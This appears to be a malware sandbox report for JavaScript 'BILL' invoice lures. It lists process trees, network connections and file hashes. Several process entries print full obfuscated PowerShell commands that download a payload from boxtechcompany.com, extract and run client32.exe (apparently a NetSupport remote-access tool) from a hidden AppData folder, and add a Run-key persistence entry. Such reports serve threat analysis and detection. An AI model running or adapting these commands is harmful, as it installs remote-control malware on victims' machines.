"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rSWtfPHxWB='https://boxtechcompany.com/1/GetData.php?14396';$nHOWpVklImSTUOhYYBi=(New-Object System.Net.WebClient).DownloadString($rSWtfPHxWB);$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn=[System.Convert]::FromBase64String($nHOWpVklImSTUOhYYBi);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -PathType Container)) { New-Item -Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -ItemType Directory };$p=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -Force; $FSDFSSD.attributes='Hidden';$s=$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rajXRsKbLyahKmgEQDRAysTgndvrH='https://boxtechcompany.com/1/GetData.php?14032';$rjENXRCqoSqtoTmbRXtRUFSynJahYI=(New-Object System.Net.WebClient).DownloadString($rajXRsKbLyahKmgEQDRAysTgndvrH);$mzPXXDkRSgchHwrjafrXw=[System.Convert]::FromBase64String($rjENXRCqoSqtoTmbRXtRUFSynJahYI);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $DqYWXtvBt=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $DqYWXtvBt -PathType Container)) { New-Item -Path $DqYWXtvBt -ItemType Directory };$p=Join-Path $DqYWXtvBt 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$mzPXXDkRSgchHwrjafrXw);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$DqYWXtvBt)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $DqYWXtvBt 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $DqYWXtvBt -Force; $FSDFSSD.attributes='Hidden';$s=$DqYWXtvBt+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ERnqGIyavgxZkhhFQQzcsMLi='https://boxtechcompany.com/1/GetData.php?5702';$uiEIBqhhSA=(New-Object System.Net.WebClient).DownloadString($ERnqGIyavgxZkhhFQQzcsMLi);$RBFufKpXmacFNkTysIcaZnCklUwhgv=[System.Convert]::FromBase64String($uiEIBqhhSA);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $qdQZulxrcLjODJPetdoUbikqRuSmW=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $qdQZulxrcLjODJPetdoUbikqRuSmW -PathType Container)) { New-Item -Path $qdQZulxrcLjODJPetdoUbikqRuSmW -ItemType Directory };$p=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$RBFufKpXmacFNkTysIcaZnCklUwhgv);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$qdQZulxrcLjODJPetdoUbikqRuSmW)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $qdQZulxrcLjODJPetdoUbikqRuSmW -Force; $FSDFSSD.attributes='Hidden';$s=$qdQZulxrcLjODJPetdoUbikqRuSmW+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5192 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5908 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL10601.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ZCImZQTlpULGp='https://boxtechcompany.com/1/GetData.php?7461';$IZtUzYNNReOunQUmIUqVkfdoVrvHlgee=(New-Object System.Net.WebClient).DownloadString($ZCImZQTlpULGp);$IINLLLBDoklTTt=[System.Convert]::FromBase64String($IZtUzYNNReOunQUmIUqVkfdoVrvHlgee);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $keRzOmOdlHhfQWTzLhoha=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $keRzOmOdlHhfQWTzLhoha -PathType Container)) { New-Item -Path $keRzOmOdlHhfQWTzLhoha -ItemType Directory };$p=Join-Path $keRzOmOdlHhfQWTzLhoha 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$IINLLLBDoklTTt);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$keRzOmOdlHhfQWTzLhoha)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $keRzOmOdlHhfQWTzLhoha 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $keRzOmOdlHhfQWTzLhoha -Force; $FSDFSSD.attributes='Hidden';$s=$keRzOmOdlHhfQWTzLhoha+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $PloRsvrHYwhtLNPidec='https://boxtechcompany.com/1/GetData.php?13982';$BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc=(New-Object System.Net.WebClient).DownloadString($PloRsvrHYwhtLNPidec);$eqEzuySWdZoamCI=[System.Convert]::FromBase64String($BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $RLZeZQGsCLTvWqlepOEruhuLtjvdf=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -PathType Container)) { New-Item -Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -ItemType Directory };$p=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$eqEzuySWdZoamCI);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RLZeZQGsCLTvWqlepOEruhuLtjvdf)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $RLZeZQGsCLTvWqlepOEruhuLtjvdf -Force; $FSDFSSD.attributes='Hidden';$s=$RLZeZQGsCLTvWqlepOEruhuLtjvdf+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1488 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6364 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6588 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6472 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6852 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7152 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1684 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5916 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6380 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blawx.com | udp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | tcp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 29.227.127.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.179.238:443 | play.google.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blawx.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | boxtechcompany.com | udp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| US | 8.8.8.8:53 | 160.224.127.188.in-addr.arpa | udp |
| NL | 81.19.137.226:443 | tcp | |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 172.67.68.212:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 226.137.19.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.68.67.172.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | boxtechcompany.com | udp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | tcp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | tcp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.194.217.172.in-addr.arpa | udp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 68.204.58.216.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.34.21:443 | virustotal.com | tcp |
| US | 216.239.34.21:443 | virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | 21.34.239.216.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| GB | 142.250.200.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.179.227:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| GB | 142.250.179.227:443 | recaptcha.net | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | tcp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | e2c43.gcp.gvt2.com | udp |
| NL | 35.214.142.18:443 | e2c43.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 18.142.214.35.in-addr.arpa | udp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
Files
\??\pipe\crashpad_1260_ULZWCYPJRYRQITGD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 547beaf63ead9326310ac0cb9a7446a8 |
| SHA1 | 8be1b5f63ff5d27aab4e552c9c768836f017a970 |
| SHA256 | 7c87b872b7679a3d10f1bd86f18081d99b386ce4512febe54c7f84635bfca3ce |
| SHA512 | 2b84824c52b91cf80c9627f4b7caddfd40aabc482f21d15313460b6cac041737acd5bf8640cdedcc2a7f4fcb7f332d48b23589fcd5e0648fcc229ba025038c7b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b7579423-7d5b-4e1c-b32d-da0e3e3c70be.tmp
| MD5 | f8c1c1ffcfbe6f7a250f45dee470af83 |
| SHA1 | 0d5e6a0b9751cb8ef7e0ac1413e9247282d6fea9 |
| SHA256 | 9dc418de524935dbdf2bac08a6628f9dd24c5ec0ad21c01b4049dba444e6e3b2 |
| SHA512 | d957236f0c9eb7f52b043999695907ddf5c3615faea9f702504addb02bc6c053114523a9b4a0fc9bf4625bc5c8a5d2d3a34901f1195511263aa9395bedb6af8e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1b2250c753297dd79d2a75fd61756788 |
| SHA1 | d0d6ab98c3545b98f16fc912dfe9f0b1884d5726 |
| SHA256 | 7d2134eb37d01077748bf6a147d84b5cf9cf337aac772fcba1b00706d29e32c0 |
| SHA512 | be2767510449cce297fc09365732043f5c111b52fc661fb2fd00025225423fbc0e63fc760ba2d7392712b75ac7d0b890c65a7d1126f477f12c3d188781f9ce86 |
C:\Users\Admin\Downloads\BILL63351.js
| MD5 | 55a8424c9605e6740e33c7f6f265e18e |
| SHA1 | 8be8f6e01c8210441eec37492d0ec1dd0a1cf0ef |
| SHA256 | 70c56698865a3a31045402db6e4519df4aa27c8b356a6e16c3ed2bd32ef74f7c |
| SHA512 | 1df2aa8d6c5b7ea7772e2940f6bf3eb2f4992ee5c8fe3d8ee3651312ef6384a3f59c8e893e6e5e1e7708cecb029ef731097023ba4be5ad9c91e5e04e3a4a4881 |
memory/4420-132-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp
memory/4420-133-0x00000261DB650000-0x00000261DB672000-memory.dmp
memory/4420-134-0x00000261DB730000-0x00000261DB740000-memory.dmp
memory/4420-135-0x00000261DB730000-0x00000261DB740000-memory.dmp
memory/4420-138-0x00000261DB840000-0x00000261DB8B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4w03yg4.ip3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4420-153-0x00000261DB730000-0x00000261DB740000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 806e07e088867c60cdbb89582f71d806 |
| SHA1 | 59371b98d0ab9a41b365a596bbffbe0a34645fdb |
| SHA256 | 7e91a5b7ed5f20ef06886f0f8c76a1a974d4477b8d8768f35b39ede05215e7ea |
| SHA512 | 4412c700dd93f5558945f921402f79a41a5599ce235875822bb01d8cf5f5a2b712aaa3b4e2bf6dfe633d27aaf0ecaa13c036db12591de9fd04c7945bb59ba6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0ec503af8195e2649d252877624684e6 |
| SHA1 | 5acdb69ca4e31d8d8f60a0ef8868d7cd008504e8 |
| SHA256 | f09a2d6c87885efe18ae53c52e19c111537d483262c68dce254250101fdf3570 |
| SHA512 | cab05d34351fc84b558027eac47486f1d38b90f72f5b7d81f4a1114061ae8a2ac865110b36103690f9a48c03d54841b06159379bdeda73da49dde0f0cbf36b5d |
memory/4420-189-0x00000261DB6F0000-0x00000261DB6FA000-memory.dmp
memory/4420-190-0x00000261DB9C0000-0x00000261DB9D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe
| MD5 | c4f1b50e3111d29774f7525039ff7086 |
| SHA1 | 57539c95cba0986ec8df0fcdea433e7c71b724c6 |
| SHA256 | 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d |
| SHA512 | 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5 |
C:\Users\Admin\AppData\Roaming\DIVX911\PCICL32.dll
| MD5 | 83373fe3096a4f8ef973ba189eba914a |
| SHA1 | b00b0a2e94f9dc5270ed8ba9ae2db36cfbe15992 |
| SHA256 | bbdff5bc76d68730b4d9d9e2015ca149189cb2484067271be81acff40975b2f2 |
| SHA512 | 02d4096933432984ee29df353e139d72dbc69e4dc64731a8cbc06d100550f49793ad9392029df83e164712b9d3105479c56a4a98274e92272a32537e0baf2b06 |
C:\Users\Admin\AppData\Roaming\DIVX911\pcicapi.dll
